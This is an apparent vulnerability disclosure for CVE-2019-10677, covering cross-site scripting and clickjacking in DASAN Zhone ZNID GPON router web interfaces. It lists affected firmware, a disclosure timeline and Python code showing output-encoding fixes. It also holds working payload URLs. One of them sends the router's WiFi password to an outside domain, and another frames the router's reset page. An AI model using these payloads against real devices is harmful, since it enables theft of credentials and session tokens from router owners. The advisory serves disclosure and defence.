CVE-2019-10677
Multiple Cross-Site Scripting (XSS) vulnerabilities in the web interface of the DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allow a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters.
This vulnerability affects all zNID models running the following firmware versions: all releases of 3.0.xxx SW (on the 3.0 branch), release 3.1.349 and earlier (on the 3.1 branch), release 3.2.087 and earlier (on the 3.2 branch), release 4.1.253 and earlier (on the 4.1 branch), release 5.0.019 and earlier (on the 5.0 branch).

Proof of Concept:

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677

= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp

= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//

= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

= Attack scenario =
http://admin:[email protected]/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//
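As an added illustration (not the vendor's code or the advisory author's), the following Python models the two injection contexts the proofs of concept above abuse, an HTML text context for the `name` parameter and a JavaScript string literal for `wlWscCfgMethod`, beside the context-specific encoding that closes each, plus the response headers that stop the `resetrouter.html` page from being framed. The templates are hypothetical stand-ins for the device's CGI output.

```python
import html
import json

# Hypothetical stand-in for zhndnsdisplay.cmd: the `name` GET parameter is
# reflected into the HTML body of the response.
def render_dns_page_vulnerable(name: str) -> str:
    # No encoding: "<script>" in `name` becomes a live script element.
    return f"<html><body>DNS file: {name}</body></html>"

def render_dns_page_fixed(name: str) -> str:
    # HTML-encode for the HTML text context; '<', '>', '&' and quotes
    # become entities and cannot open a tag.
    return f"<html><body>DNS file: {html.escape(name, quote=True)}</body></html>"

# Hypothetical stand-in for wlsecrefresh.wl: the parameter value lands inside
# a single-quoted JavaScript string in an inline script, next to variables
# such as wpaPskKey and sessionKey.
def render_wl_script_vulnerable(cfg_method: str) -> str:
    # A value starting with ';  terminates the literal and runs what follows.
    return f"<script>var wlWscCfgMethod = '{cfg_method}';</script>"

def render_wl_script_fixed(cfg_method: str) -> str:
    # json.dumps yields a double-quoted JS string literal with quotes,
    # backslashes, control and non-ASCII characters escaped. '<' and '/'
    # are escaped too so a "</script>" inside the value cannot close the tag.
    literal = json.dumps(cfg_method).replace("<", "\\u003c").replace("/", "\\/")
    return f"<script>var wlWscCfgMethod = {literal};</script>"

def anti_clickjacking_headers() -> dict:
    # Either header on its own makes the page unframeable; both are sent so
    # that older and newer browsers are covered.
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }
```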

Timeline:
2019-03-31 — requested CVE-2019-10677
2019-04-01 — reported to vendor
2019-09-03 — security patch


Adam Ziaja <adam@adamziaja.com>